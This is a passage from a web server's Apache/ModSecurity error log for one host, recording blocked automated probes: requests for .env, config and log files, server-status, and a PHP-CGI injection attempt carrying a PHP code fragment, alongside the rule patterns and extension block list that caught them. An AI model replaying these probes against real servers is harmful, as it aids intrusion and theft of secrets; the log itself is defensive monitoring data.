"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aRIP_ywklNu1D6UQIGMqtQAAANE"], referer: https://clickstarpics.com//wp-login.php [Wed Nov 12 21:32:02.396648 2025] [:error] [pid 32411:tid 32480] [client 4.217.221.186:11101] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Nov 16 23:36:25.311471 2025] [:error] [pid 5961:tid 5976] [client 74.176.64.167:62063] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Nov 25 18:10:36.952689 2025] [:error] [pid 17579:tid 17605] [client 20.249.10.99:20454] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Tue Nov 25 18:10:57.534200 2025] [:error] [pid 24320:tid 24332] [client 20.249.10.99:20369] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/myip.php [Tue Nov 25 18:14:05.057602 2025] [:error] [pid 17408:tid 17496] [client 20.249.10.99:20302] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Nov 29 00:54:14.093437 2025] [:error] [pid 5933:tid 5988] [client 164.90.228.79:57856] [client 164.90.228.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aSooFu_dPJ-Q-bTs_F6P_wAAAVc"] [Sat Nov 29 00:54:19.364118 2025] [authz_core:error] [pid 6946:tid 6967] [client 164.90.228.79:57904] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Sat Nov 29 04:46:13.108439 2025] [access_compat:error] [pid 8334:tid 8437] [client 18.183.158.174:37724] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase [Sat Nov 29 04:46:13.108449 2025] [access_compat:error] [pid 8509:tid 8527] [client 18.183.158.174:37130] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env [Sat Nov 29 04:46:27.524006 2025] [:error] [pid 8509:tid 8531] [client 18.183.158.174:46490] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app.config"] [unique_id "aSpeg8zf1XASq3fPYsYG-wAAANQ"] [Sat Nov 29 04:46:27.997133 2025] [:error] [pid 8332:tid 8416] [client 18.183.158.174:46844] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aSpeg7JrfWjqSVAxu4l9zQAAAFU"] [Sat Nov 29 04:46:29.089177 2025] [:error] [pid 8332:tid 8421] [client 18.183.158.174:47638] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.config"] [unique_id "aSpehbJrfWjqSVAxu4l90QAAAFc"] [Sat Nov 29 04:46:47.595826 2025] [:error] [pid 8332:tid 8392] [client 18.183.158.174:54784] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aSpel7JrfWjqSVAxu4l98gAAAEQ"] [Sat Nov 29 04:46:47.596526 2025] [:error] [pid 8332:tid 8399] [client 18.183.158.174:54956] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/errors.log"] [unique_id "aSpel7JrfWjqSVAxu4l98wAAAEs"] [Sat Nov 29 04:46:47.597381 2025] [:error] [pid 8330:tid 8366] [client 18.183.158.174:54660] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aSpelxIBYkE-PEbfyV5nqgAAAAU"] [Sat Nov 29 04:46:48.865736 2025] [:error] [pid 8509:tid 8515] [client 18.183.158.174:55044] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php_error.log"] [unique_id "aSpemMzf1XASq3fPYsYHVgAAAMQ"] [Sat Nov 29 11:18:08.130785 2025] [access_compat:error] [pid 8509:tid 8535] [client 35.182.249.225:53320] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env [Sat Nov 29 11:18:08.725743 2025] [access_compat:error] [pid 8334:tid 8417] [client 35.182.249.225:53538] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env [Sat Nov 29 11:18:09.083741 2025] [access_compat:error] [pid 8509:tid 8528] [client 35.182.249.225:53804] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase [Sat Nov 29 11:18:27.064669 2025] [:error] [pid 8509:tid 8511] [client 35.182.249.225:33494] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app.config"] [unique_id "aSq6Y8zf1XASq3fPYsb4ZAAAAMA"] [Sat Nov 29 11:18:28.461321 2025] [:error] [pid 8332:tid 8402] [client 35.182.249.225:33918] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aSq6ZLJrfWjqSVAxu4nv6gAAAE0"] [Sat Nov 29 11:18:29.815402 2025] [:error] [pid 8334:tid 8406] [client 35.182.249.225:34484] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.config"] [unique_id "aSq6ZRJOmErLa-kY3lf9dgAAAIA"] [Sat Nov 29 11:18:59.278297 2025] [:error] [pid 8334:tid 8406] [client 35.182.249.225:48680] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aSq6gxJOmErLa-kY3lf9ywAAAIA"] [Sat Nov 29 11:18:59.279394 2025] [:error] [pid 8509:tid 8524] [client 35.182.249.225:48678] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aSq6g8zf1XASq3fPYsb4owAAAM0"] [Sat Nov 29 11:18:59.670951 2025] [:error] [pid 8509:tid 8525] [client 35.182.249.225:49152] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php_error.log"] [unique_id "aSq6g8zf1XASq3fPYsb4pQAAAM4"] [Sat Nov 29 11:18:59.671632 2025] [:error] [pid 8509:tid 8513] [client 35.182.249.225:48934] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/errors.log"] [unique_id "aSq6g8zf1XASq3fPYsb4pgAAAMI"] [Sat Nov 29 17:27:32.318636 2025] [:error] [pid 8334:tid 8438] [client 43.207.152.34:48370] [client 43.207.152.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/config.ini"] [unique_id "aSsQ5BJOmErLa-kY3lcnMwAAAJU"] [Sat Nov 29 17:31:03.895928 2025] [:error] [pid 8334:tid 8412] [client 195.178.110.201:55176] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/captains-landing-apartments/?utm_medium=redirect&utm_campaign=vanity&original_referrer=https://captainslandingapts.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aSsRtxJOmErLa-kY3lcnggAAAII"] [Sun Nov 30 09:49:50.017277 2025] [:error] [pid 21497:tid 21547] [client 158.51.121.183:46826] [client 158.51.121.183] ModSecurity: Access denied with code 403 (phase 2). Found 30 byte(s) in ARGS:_path outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/_fragment"] [unique_id "aSv3HnD9e9KMmdYu_RCNtwAAAZU"] [Mon Dec 01 18:05:33.565963 2025] [:error] [pid 4179:tid 4273] [client 147.182.254.163:57548] [client 147.182.254.163] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:CFGLOBALS. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:CFGLOBALS: urltoken=CFID#=447305288&CFTOKEN#=c31320631a0d1609-8548C213-EB88-5E83-3FB8D7175BABBA06&jsessionid#=0C44ABA4033ED80F5F37CD05CA7961F9.cfusion#lastvisit={ts '2025-12-01 08:36:17'}#hitcount=2#timecreated={ts '2025-12-01 08:36:16'}#cftoken=c31320631a0d1609-8548C213-EB88-5E83-3FB8D7175BABBA06#cfid=447305288#"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aS28zZB_lWgrXQ3xWkEDLQAAAQo"], referer: https://www.cleaningsanfrancisco.com//wp-login.php [Mon Dec 01 18:12:41.862258 2025] [:error] [pid 31546:tid 31566] [client 48.210.70.5:10229] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Dec 03 22:50:39.467960 2025] [:error] [pid 20412:tid 20424] [client 165.22.34.189:44700] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aTCinzaN5y-yuajOnDobTQAAAQk"] [Wed Dec 03 22:50:41.542903 2025] [:error] [pid 31876:tid 31996] [client 147.182.200.94:55556] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aTCioclX2eRobly9P_Q_8QAAAIw"] [Wed Dec 03 22:50:47.507829 2025] [authz_core:error] [pid 20412:tid 20428] [client 165.22.34.189:59878] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Dec 03 22:50:49.630226 2025] [authz_core:error] [pid 31874:tid 31971] [client 147.182.200.94:43574] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Fri Dec 05 01:31:05.089887 2025] [:error] [pid 14163:tid 14185] [client 54.255.245.214:45304] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag 